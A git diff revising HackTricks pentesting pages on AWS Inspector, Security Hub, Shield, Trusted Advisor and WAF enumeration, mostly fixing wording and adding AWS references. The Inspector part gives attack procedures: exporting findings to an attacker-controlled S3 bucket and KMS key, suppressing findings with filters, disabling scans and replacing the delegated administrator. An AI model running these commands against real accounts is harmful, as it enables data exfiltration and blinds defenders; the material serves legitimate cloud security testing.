-- **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title.
-- **Execution**: Scans are performed or scheduled based on instance tags and defined schedules.
-- **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance.
+- **Configuration**: Each check evaluates a system configuration against a CIS Benchmark recommendation and has a CIS check ID and title.
+- **Execution**: Scans are performed or scheduled using instance tags and a defined schedule.
+- **Results**: Results indicate which checks passed, skipped, or failed.
 
 ### Enumeration
+
+The following AWS CLI commands enumerate Inspector2 account state, findings, CIS scans, configuration, coverage, and legacy Inspector resources.<sup>[[2]](#references)[[15]](#references)[[16]](#references)</sup>
 
 ```bash
 # Administrator and member accounts #
 
-## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
+## Retrieve information about the AWS Inspector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
 aws inspector2 get-delegated-admin-account
 
 ## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
@@ -104,13 +105,12 @@ aws inspector2 list-account-permissions
 
 # Findings #
 
-## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
+## List a subset of information of the findings for your environment (ReadOnlyAccess policy is enough for this)
 aws inspector2 list-findings
 ## Retrieve vulnerability intelligence details for the specified findings
 aws inspector2 batch-get-finding-details --finding-arns <value>
 ## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
-aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
- | ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
+aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER | ACCOUNT | AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
 ## Retrieve code snippet information about one or more specified code vulnerability findings
 aws inspector2 batch-get-code-snippet --finding-arns <value>
 ## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
@@ -157,9 +157,9 @@ aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CO
 ## List the filters associated to your AWS account
 aws inspector2 list-filters
 
-## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
+## List coverage details for resources monitored by AWS Inspector (ReadOnlyAccess policy is enough for this)
 aws inspector2 list-coverage
-## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
+## Retrieve coverage statistics about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
 aws inspector2 list-coverage-statistics
 
 ## List the aggregated usage total over the last 30 days
@@ -190,20 +190,20 @@ aws inspector list-rules-packages
 >
 > However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones).
 
-#### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport`
+#### `inspector2:CreateFindingsReport`, `inspector2:CreateSbomExport`
 
-An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks.
+An attacker could generate detailed findings reports or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. These reports can expose affected resources, vulnerabilities, and software components that could enable targeted attacks.<sup>[[2]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 # Findings report
 aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
 # SBOM report
-aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]
+aws inspector2 create-sbom-export --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]
 ```
 
-The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key:
+The following example shows how to export all Active findings from Amazon Inspector to an attacker-controlled Amazon S3 bucket using an attacker-controlled Amazon KMS key.<sup>[[7]](#references)</sup>
 
-1. **Create an Amazon S3 Bucket** and attach a policy to it in order to be accessible from the victim Amazon Inspector:
+1. **Create an Amazon S3 bucket** and attach a policy to it so that the victim's Amazon Inspector can write the report.<sup>[[7]](#references)</sup>
 
 ```json
 {
@@ -230,7 +230,7 @@ The following example shows how to exfiltrate all the Active findings from Amazo
 }
 ```
 
-2. **Create an Amazon KMS key** and attach a policy to it in order to be usable by the victim’s Amazon Inspector:
+2. **Create an Amazon KMS key** and attach a policy to it so that the victim's Amazon Inspector can use it for report encryption.<sup>[[7]](#references)</sup>
 
 ```json
 {
@@ -270,16 +270,16 @@ The following example shows how to exfiltrate all the Active findings from Amazo
 aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
 ```
 
-- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses.
+- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses.<sup>[[7]](#references)</sup>
 
 #### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport`
 
-An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues.
+An attacker could cancel the generation of a findings report or SBOM report, preventing security teams from receiving timely vulnerability and software-inventory information.<sup>[[2]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 # Cancel findings report generation
 aws inspector2 cancel-findings-report --report-id <value>
-# Cancel SBOM report generatiom
+# Cancel SBOM report generation
 aws inspector2 cancel-sbom-export --report-id <value>
 ```
 
@@ -287,7 +287,7 @@ aws inspector2 cancel-sbom-export --report-id <value>
 
 #### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter`
 
-An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the **action** is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response.
+An attacker with these permissions could manipulate the filters that determine which findings are displayed or suppressed. Setting the **action** to `SUPPRESS` creates a suppression rule, which hides matching findings from the default view; changing or deleting filters could conceal critical vulnerabilities or create noise for defenders.<sup>[[2]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 # Create
@@ -302,15 +302,15 @@ aws inspector2 delete-filter --arn <value>
 
 #### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`)
 
-An attacker could significantly disrupt the security management structure.
+An attacker could significantly disrupt the security management structure by disabling the delegated administrator or enabling a different administrator.<sup>[[2]](#references)[[17]](#references)[[18]](#references)</sup>
 
-- Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports.
-- Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities.
+- Disabling the delegated admin account could prevent the security team from centrally accessing and managing Amazon Inspector settings and reports.
+- Enabling an unauthorized admin account could allow an attacker to control organization-wide security configurations, potentially disabling scans or modifying settings to hide malicious activity.
 
 > [!WARNING]
-> It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator.
+> The unauthorized account must be in the same AWS Organization as the victim to become the delegated administrator.<sup>[[18]](#references)</sup>
 >
-> In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`**
+> Before another account can be enabled as delegated administrator, the legitimate administrator must be deregistered from the organization. This requires the **`organizations:DeregisterDelegatedAdministrator`** permission and can be done with **`aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal inspector2.amazonaws.com`**.<sup>[[18]](#references)[[20]](#references)</sup>
 
 ```bash
 # Disable
@@ -323,10 +323,10 @@ aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <valu
 
 #### `inspector2:AssociateMember`, `inspector2:DisassociateMember`
 
-An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection.
+An attacker could manipulate member-account associations within an Amazon Inspector organization. Associating unauthorized accounts or disassociating legitimate ones could change which accounts are included in centralized security scans and reporting.<sup>[[2]](#references)[[17]](#references)</sup>
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
+> This action must be performed by the delegated administrator.<sup>[[17]](#references)</sup>
 
 ```bash
 # Associate
@@ -339,10 +339,10 @@ aws inspector2 disassociate-member --account-id <value>
 
 #### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`)
 
-An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations.
+An attacker with the `inspector2:Disable` permission could disable security scans for selected resource types (EC2, ECR, Lambda, or Lambda code) in specified accounts, leaving parts of the environment unmonitored. With **`inspector2:Enable`** and **`iam:CreateServiceLinkedRole`**, the attacker could re-enable only selected scan types later.<sup>[[2]](#references)[[17]](#references)[[19]](#references)</sup>
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
+> After activation, deactivation is controlled by the delegated administrator; organization policies can also prevent delegated administrators or members from changing policy-managed scan types.<sup>[[17]](#references)[[19]](#references)</sup>
 
 ```bash
 # Disable
@@ -355,10 +355,10 @@ aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--acco
 
 #### `inspector2:UpdateOrganizationConfiguration`
 
-An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts.
+An attacker with this permission could update the configuration for the Amazon Inspector organization, affecting the default scanning features enabled for new member accounts.<sup>[[2]](#references)[[17]](#references)</sup>
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
+> This action requires the delegated-administrator context for organization-wide settings.<sup>[[17]](#references)</sup>
 
 ```bash
 aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
@@ -368,21 +368,37 @@ aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,e
 
 #### `inspector2:TagResource`, `inspector2:UntagResource`
 
-An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity.
+An attacker could manipulate tags on Amazon Inspector resources, which can affect organization and automation of security assessments.<sup>[[2]](#references)</sup>
 
 ```bash
 aws inspector2 tag-resource --resource-arn <value> --tags <value>
 aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
 ```
 
-- **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation.
+- **Potential Impact**: Disruption of resource organization, cost allocation, or tag-driven security automation.
 
 ## References
 
-- [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html)
-- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html)
+- [1] [What is Amazon Inspector?](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html)
+- [2] [Actions, resources, and condition keys for Amazon Inspector2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_inspector2.html)
+- [3] [Understanding Amazon Inspector findings](https://docs.aws.amazon.com/inspector/latest/user/findings-understanding.html)
+- [4] [Amazon Inspector finding types](https://docs.aws.amazon.com/inspector/latest/user/findings-types.html)
+- [5] [Filtering your Amazon Inspector findings](https://docs.aws.amazon.com/inspector/latest/user/findings-managing-filtering.html)
+- [6] [Suppressing Amazon Inspector findings](https://docs.aws.amazon.com/inspector/latest/user/findings-managing-supression-rules.html)
+- [7] [Exporting Amazon Inspector findings reports](https://docs.aws.amazon.com/inspector/latest/user/findings-managing-exporting-reports.html)
+- [8] [Exporting SBOMs with Amazon Inspector](https://docs.aws.amazon.com/inspector/latest/user/sbom-export.html)
+- [9] [Scanning Amazon EC2 instances with Amazon Inspector](https://docs.aws.amazon.com/inspector/latest/user/scanning-ec2.html)
+- [10] [Amazon Inspector deep inspection for Linux-based Amazon EC2 instances](https://docs.aws.amazon.com/inspector/latest/user/deep-inspection.html)
+- [11] [Scanning Amazon Elastic Container Registry container images with Amazon Inspector](https://docs.aws.amazon.com/inspector/latest/user/scanning-ecr.html)
+- [12] [Scanning AWS Lambda functions with Amazon Inspector](https://docs.aws.amazon.com/inspector/latest/user/scanning-lambda.html)
+- [13] [Amazon Inspector Lambda code scanning](https://docs.aws.amazon.com/inspector/latest/user/scanning_resources_lambda_code.html)
+- [14] [Center for Internet Security (CIS) scans for Amazon EC2 instance operating systems](https://docs.aws.amazon.com/inspector/latest/user/scanning-cis.html)
+- [15] [inspector2 — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/inspector2/)
+- [16] [inspector — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/inspector/)
+- [17] [Understanding the delegated administrator account and member account in Amazon Inspector](https://docs.aws.amazon.com/inspector/latest/user/admin-member-relationship.html)
+- [18] [Designating a delegated administrator account for Amazon Inspector](https://docs.aws.amazon.com/inspector/latest/user/designating-admin.html)
+- [19] [Deactivating Amazon Inspector](https://docs.aws.amazon.com/inspector/latest/user/deactivating-best-practices.html)
+- [20] [DeregisterDelegatedAdministrator - AWS Organizations](https://docs.aws.amazon.com/organizations/latest/APIReference/API_DeregisterDelegatedAdministrator.html)
+- [21] [Actions, resources, and condition keys for Amazon Inspector2 - legacy URL](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
@@ -1,26 +1,30 @@
 # AWS - Security Hub Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Security Hub
 
-**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues.
+**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues.<sup>[[1]](#references)</sup>
 
-It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts
+It **centralizes security-related findings across accounts**, and provides a UI for viewing these. Security Hub is regional by default: it receives and processes findings in the Region where it is enabled. Cross-Region aggregation can optionally replicate findings and other security data from linked Regions to a configured home Region.<sup>[[1]](#references)[[2]](#references)</sup>
 
 **Characteristics**
 
-- Regional (findings don't cross regions)
+The following characteristics and finding sources are documented by AWS; cross-Region aggregation is optional.<sup>[[1]](#references)[[2]](#references)</sup>
+
+- Regional (enable the service in each Region whose findings you need)
 - Multi-account support
-- Findings from:
-  - Guard Duty
-  - Config
+- Findings can come from integrated AWS services, supported third-party products, and Security Hub control checks; examples include:
+  - GuardDuty
+  - AWS Config-backed control checks
   - Inspector
   - Macie
-  - third party
-  - self-generated against CIS standards
+  - supported third-party products
+  - self-generated control findings against CIS and other standards
 
 ## Enumeration
+
+Most Security Hub API operations run in the active or explicitly specified Region, so repeat enumeration per Region or use the configured home Region when cross-Region aggregation is enabled.<sup>[[2]](#references)[[3]](#references)</sup>
+
+Several organization and administrator operations require the appropriate management or Security Hub administrator account. `get-master-account` is deprecated in favor of `get-administrator-account`, but remains available for compatibility; the notes below retain that distinction.<sup>[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```
 # Get basic info
@@ -29,10 +33,13 @@ aws securityhub describe-hub
 # Get securityhub org config
 aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error
 
-# Get the configured admin for securityhub
+# Get the configured administrator for the current member account
 aws securityhub get-administrator-account
-aws securityhub get-master-account # Another way
-aws securityhub list-organization-admin-accounts # Another way
+# Deprecated compatibility lookup; use get-administrator-account instead
+aws securityhub get-master-account
+
+# List delegated administrators (organization management account)
+aws securityhub list-organization-admin-accounts
 
 # Get enabled standards
 aws securityhub get-enabled-standards
@@ -57,11 +64,14 @@ TODO, PRs accepted
 
 ## References
 
-- [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info)
-- [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html)
+- [1] [Introduction to AWS Security Hub CSPM](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html)
+- [2] [Understanding cross-Region aggregation in Security Hub CSPM](https://docs.aws.amazon.com/securityhub/latest/userguide/finding-aggregation.html)
+- [3] [AWS CLI Security Hub command reference](https://docs.aws.amazon.com/cli/latest/reference/securityhub/)
+- [4] [get-master-account — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/securityhub/get-master-account.html)
+- [5] [describe-organization-configuration — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/securityhub/describe-organization-configuration.html)
+- [6] [list-organization-admin-accounts — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/securityhub/list-organization-admin-accounts.html)
+- [7] [list-automation-rules — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/securityhub/list-automation-rules.html)
+- [8] [get-members — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/securityhub/get-members.html)
+- [9] [AWS Security Hub - CloudSecDocs](https://cloudsecdocs.com/aws/services/logging/other/#general-info)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
@@ -1,19 +1,21 @@
 # AWS - Shield Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Shield
 
-AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
+AWS Shield is a managed DDoS protection service that helps protect AWS applications and infrastructure against distributed denial-of-service (DDoS) attacks.<sup>[[1]](#references)</sup>
 
-**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53.
+**AWS Shield Standard** is automatically provided to all AWS customers at no additional charge. It defends against common network-layer (layer 3) and transport-layer (layer 4) DDoS attacks; using Shield Standard with Amazon CloudFront and Amazon Route 53 provides comprehensive availability protection against known infrastructure-layer events.<sup>[[2]](#references)</sup>
 
-**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**.
+**AWS Shield Advanced** requires a subscription and adds protection for resources such as Amazon EC2 (through protected Elastic IP addresses), Elastic Load Balancing load balancers, Amazon CloudFront distributions, AWS Global Accelerator standard accelerators, and Amazon Route 53 hosted zones. It also supports application-layer (layer 7) DDoS protections for eligible CloudFront distributions and Application Load Balancers.<sup>[[3]](#references)[[4]](#references)</sup>
 
-Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
+Shield Advanced also provides 24/7 access to the AWS Shield Response Team (SRT) for customers on Business or Enterprise Support plans.<sup>[[5]](#references)</sup>
+
+## References
+
+- [1] [How AWS Shield and Shield Advanced work](https://docs.aws.amazon.com/waf/latest/developerguide/ddos-overview.html)
+- [2] [AWS Shield Standard overview](https://docs.aws.amazon.com/waf/latest/developerguide/ddos-standard-summary.html)
+- [3] [Setting up AWS Shield Advanced](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-ddos.html)
+- [4] [List of resources that AWS Shield Advanced protects](https://docs.aws.amazon.com/waf/latest/developerguide/ddos-protections-by-resource-type.html)
+- [5] [AWS Shield Features](https://aws.amazon.com/shield/features/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
@@ -1,72 +1,78 @@
 # AWS - Trusted Advisor Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## AWS Trusted Advisor Overview
 
-Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories:
+Trusted Advisor inspects your AWS environment and provides recommendations based on AWS best practices to help save money, improve availability and performance, and close security gaps.<sup>[[1]](#references)</sup> Trusted Advisor organizes its checks into six categories: cost optimization, performance, security, fault tolerance, service limits, and operational excellence.<sup>[[2]](#references)</sup> Trusted Advisor can report findings for resources in multiple AWS Regions, with the affected Region included in many check reports.<sup>[[4]](#references)</sup>
 
-1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses.
-2. **Performance:** Identifies potential performance bottlenecks.
-3. **Security:** Scans for vulnerabilities or weak security configurations.
-4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance.
+The categories cover the following kinds of recommendations.<sup>[[3]](#references)</sup>
 
-The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security.
+1. **Cost Optimization:** Identifies opportunities to reduce costs.
+2. **Performance:** Recommends changes that can improve application speed and responsiveness.
+3. **Security:** Recommends changes to make AWS solutions more secure.
+4. **Fault Tolerance:** Identifies redundancy shortfalls and overused resources that can reduce resilience.
+5. **Service Limits:** Checks whether account usage is approaching or exceeding AWS service quotas.
+6. **Operational Excellence:** Recommends ways to operate AWS environments effectively and at scale.
+
+Customers with AWS Business Support+, AWS Enterprise Support, or AWS Unified Operations can access all Trusted Advisor checks. Basic or Developer Support accounts can access all Service Limits checks and six selected checks in the Security and Fault Tolerance categories; the selected checks are listed below.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### Notifications and Data Refresh
 
-- Trusted Advisor can issue alerts.
-- Items can be excluded from its checks.
-- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh.
+- Check results use action-recommended, investigation-recommended, no-problems-detected, and excluded-items statuses. Trusted Advisor can also send weekly email summaries of check results.<sup>[[3]](#references)</sup>
+- Individual resources can be excluded from check results and reviewed under excluded items.<sup>[[3]](#references)</sup>
+- Refresh behavior depends on the support plan and check: Basic or Developer Support users refresh checks from the console, Business Support+, Enterprise Support, and Unified Operations automatically refresh checks weekly, and some checks refresh several times daily and cannot be manually refreshed. The `RefreshTrustedAdvisorCheck` API reports how long remains before a check is eligible for refresh.<sup>[[1]](#references)[[3]](#references)[[5]](#references)</sup>
 
-### **Checks Breakdown**
+### Checks Breakdown
 
-#### CategoriesCore
+#### Check Categories
+
+AWS documents these six check categories.<sup>[[2]](#references)[[3]](#references)</sup>
 
 1. Cost Optimization
-2. Security
-3. Fault Tolerance
-4. Performance
+2. Performance
+3. Security
+4. Fault Tolerance
 5. Service Limits
-6. S3 Bucket Permissions
+6. Operational Excellence
 
 #### Core Checks
 
-Limited to users without business or enterprise support plans:
+Available to Basic or Developer Support accounts in addition to all Service Limits checks.<sup>[[2]](#references)</sup>
 
-1. Security Groups - Specific Ports Unrestricted
-2. IAM Use
-3. MFA on Root Account
-4. EBS Public Snapshots
-5. RDS Public Snapshots
-6. Service Limits
+1. Amazon EBS Public Snapshots
+2. Amazon RDS Public Snapshots
+3. Amazon S3 Bucket Permissions
+4. MFA on root account
+5. Security Groups – Specific Ports Unrestricted
+6. AWS STS global endpoint usage across AWS Regions
 
 #### Security Checks
 
-A list of checks primarily focusing on identifying and rectifying security threats:
+A list of checks that identify insecure configurations and exposed resources includes the following.<sup>[[4]](#references)</sup>
 
-- Security group settings for high-risk ports
-- Security group unrestricted access
-- Open write/list access to S3 buckets
-- MFA enabled on root account
-- RDS security group permissiveness
-- CloudTrail usage
-- SPF records for Route 53 MX records
-- HTTPS configuration on ELBs
-- Security groups for ELBs
-- Certificate checks for CloudFront
-- IAM access key rotation (90 days)
-- Exposure of access keys (e.g., on GitHub)
-- Public visibility of EBS or RDS snapshots
-- Weak or absent IAM password policies
+- Security Groups – Specific Ports Unrestricted
+- Security Groups – Unrestricted Access
+- Amazon S3 Bucket Permissions, including open list, upload, or delete access
+- MFA on root account
+- Amazon RDS Security Group Access Risk
+- AWS CloudTrail Management Event Logging
+- Amazon Route 53 MX Resource Record Sets and Sender Policy Framework
+- ELB Listener Security and Application Load Balancer Target Groups Encrypted Protocol
+- Application Load Balancer security group and Classic Load Balancer Security Groups
+- CloudFront Custom SSL Certificates in the IAM Certificate Store and CloudFront SSL Certificate on the Origin Server
+- IAM Access Key Rotation, which checks active keys that have not been rotated in the last 90 days
+- Exposed Access Keys, including keys exposed in public code repositories
+- Amazon EBS Public Snapshots and Amazon RDS Public Snapshots
+- IAM Password Policy
 
-AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices.
+AWS Trusted Advisor is therefore useful for enumerating account-level recommendations and prioritizing remediation of cost, performance, security, resilience, quota, and operational findings.<sup>[[1]](#references)[[3]](#references)</sup>
 
-## **References**
+## References
 
-- [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor)
+- [1] [AWS Trusted Advisor - AWS Support](https://docs.aws.amazon.com/awssupport/latest/user/trusted-advisor.html)
+- [2] [AWS Trusted Advisor check reference - AWS Support](https://docs.aws.amazon.com/awssupport/latest/user/trusted-advisor-check-reference.html)
+- [3] [Get started with Trusted Advisor Recommendations - AWS Support](https://docs.aws.amazon.com/awssupport/latest/user/get-started-with-aws-trusted-advisor.html)
+- [4] [Security checks - AWS Support](https://docs.aws.amazon.com/awssupport/latest/user/security-checks.html)
+- [5] [RefreshTrustedAdvisorCheck - AWS Support](https://docs.aws.amazon.com/awssupport/latest/APIReference/API_RefreshTrustedAdvisorCheck.html)
+- [6] [AWS Trusted Advisor - CloudSecDocs](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
@@ -1,86 +1,84 @@
 # AWS - WAF Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## AWS WAF
 
-AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules.
+AWS WAF is a **web application firewall** that monitors HTTP and HTTPS requests forwarded to protected resources and lets you control access with rules that can address common threats such as SQL injection and cross-site scripting.<sup>[[2]](#references)</sup>
 
 ### Key concepts
 
 #### Web ACL (Access Control List)
 
-A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions.
+A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions.<sup>[[2]](#references)</sup>
 
 #### Rule Group
 
-A Rule Group is a reusable collection of rules that you can apply to multiple Web ACLs. Rule groups help manage and maintain consistent rule sets across different web applications or APIs.
+A Rule Group is a reusable collection of rules that you can add to multiple Web ACLs. Rule groups help manage consistent rule sets across different web applications or APIs.<sup>[[5]](#references)</sup>
 
-Each rule group has its associated **capacity**, which helps to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. Once its value is set during creation, it is not possible to modify it.
